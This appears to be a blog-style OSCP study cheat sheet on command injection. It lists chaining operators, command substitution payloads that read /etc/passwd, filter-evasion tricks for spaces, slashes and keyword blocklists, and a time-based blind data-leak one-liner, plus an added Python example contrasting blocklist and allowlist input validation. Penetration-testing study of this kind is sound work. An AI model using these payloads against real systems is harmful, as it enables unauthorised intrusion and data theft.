My OSCP Journey: Tips, Tricks, and Cheat Sheets

Command Injection

Command Chaining

<input>; ls
<input>& ls
<input>&& ls
<input>| ls
<input>|| ls

Also try:

  • Prepending a flag or parameter.

  • Removing spaces (<input>;ls).

Chaining Operators

Supported on both Windows and Unix.

| Syntax | Example | Description |
| --- | --- | --- |
| %0A | cmd1 %0A cmd2 | Newline. Executes both. |
| ; | cmd1 ; cmd2 | Semi-colon operator. Executes both. |
| & | cmd1 & cmd2 | Runs cmd1 in the background. Executes both. |
| \| | cmd1 \| cmd2 | Pipe operator. Executes both; the output of cmd1 becomes the input of cmd2. |
| && | cmd1 && cmd2 | AND operator. Executes cmd2 only if cmd1 succeeds. |
| \|\| | cmd1 \|\| cmd2 | OR operator. Executes cmd2 only if cmd1 fails. |

I/O Redirection

> /var/www/html/output.txt
< /etc/passwd

Command Substitution

The shell substitutes the output of the enclosed command in place of the substitution itself, so that output becomes part of the injected input.

<input> `cat /etc/passwd`
<input> $(cat /etc/passwd)

Filter Bypassing

Space filtering

Linux

cat</etc/passwd                # input redirection needs no space
# bash only
{cat,/etc/passwd}              # brace expansion inserts the space itself
cat${IFS}/etc/passwd           # $IFS defaults to space/tab/newline
v=$'cat\x20/etc/passwd'&&$v    # \x20 is a space inside $'...'
IFS=,;`cat<<<cat,/etc/passwd`  # IFS=, makes the comma a word separator

Windows

# %VAR:~start,-end% takes a substring of an env var whose value contains a space
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

Slash (/) filtering

echo ${HOME:0:1} # /
cat ${HOME:0:1}etc${HOME:0:1}passwd
echo . | tr '!-0' '"-1' # /
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Command filtering

Quotes.

w'h'o'am'i
w"h"o"am"i

Backslash.

w\ho\am\i
/\b\i\n/////s\h

At symbol.

who$@ami

Variable expansion.

v=/e00tc/pa00sswd
cat ${v//00/}

Wildcards.

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
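Every bypass in this section targets a blocklist filter. Added example, not code from the original page: a constructed Python "ping a host" handler showing the naive blocklist that the `${IFS}` trick walks past, beside an allowlist check and a shell-free argv build that takes the shell out of the path entirely. The function names (`blocklist_accepts`, `allowlist_accepts`, `build_ping_argv`, `run_ping`) and the sample inputs are assumptions of this example.

```python
import re
import subprocess

# Constructed sample: the blocklist many "ping this host" handlers use.
# The tricks listed above (${IFS}, {cat,...}, %0A ...) exist precisely to
# slip past lists like this one.
BLOCKED = (";", "&", "|", "`", "$(", "\n", "%0a", " ")


def blocklist_accepts(user_input: str) -> bool:
    """Return True when the naive blocklist would pass the input to a shell."""
    lowered = user_input.lower()
    return not any(token in lowered for token in BLOCKED)


# Allowlist: a dotted IPv4 literal or a plain hostname, nothing else.
HOST_RE = re.compile(
    r"^(?:\d{1,3}(?:\.\d{1,3}){3}"
    r"|[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?)$"
)


def allowlist_accepts(user_input: str) -> bool:
    """Return True only for input that matches the expected shape exactly."""
    return HOST_RE.fullmatch(user_input) is not None


def build_ping_argv(host: str) -> list[str]:
    """Validate, then build an argv list: with shell=False no shell parses it,
    so ;, &, |, $(...) and ${IFS} would be plain bytes inside one argument."""
    if not allowlist_accepts(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Hardened form: validated argv, no shell, bounded runtime."""
    return subprocess.run(build_ping_argv(host), shell=False,
                          capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    for candidate in ("10.0.0.5", "10.0.0.5;id", "10.0.0.5${IFS}id"):
        print(f"{candidate!r:22} blocklist={blocklist_accepts(candidate)!s:5} "
              f"allowlist={allowlist_accepts(candidate)}")
```

The point to take from the table printed by the block is that `10.0.0.5${IFS}id` passes the blocklist but fails the allowlist; the filter's shape, not its length, decides the outcome.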

Time Based Data Exfiltration

time if [ $(uname -a | cut -c1) == L ]; then sleep 5; fi